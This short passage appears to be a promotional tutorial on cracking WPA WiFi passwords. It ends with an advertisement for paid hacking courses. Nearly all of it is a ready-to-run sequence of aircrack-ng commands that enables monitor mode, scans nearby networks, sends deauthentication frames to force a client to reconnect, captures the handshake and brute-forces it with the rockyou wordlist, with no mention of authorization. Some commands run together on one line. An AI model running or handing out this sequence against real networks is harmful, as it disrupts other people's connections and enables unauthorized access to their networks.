WiFi is the most attacked network type because it broadcasts signals that anyone nearby can intercept.
sudo airmon-ng check kill
sudo airmon-ng start wlan0sudo airodump-ng wlan0monThis shows ALL nearby WiFi networks with their BSSID, channel, encryption, clients, and signal strength.
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0monsudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0monThis disconnects a client, forcing them to reconnect — capturing the 4-way handshake.
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.capSubscribe to ONLY4YOU and get hands-on access to 40+ premium courses — Ethical Hacking, Kali Linux, Metasploit, Network Hacking, Bug Bounty & more!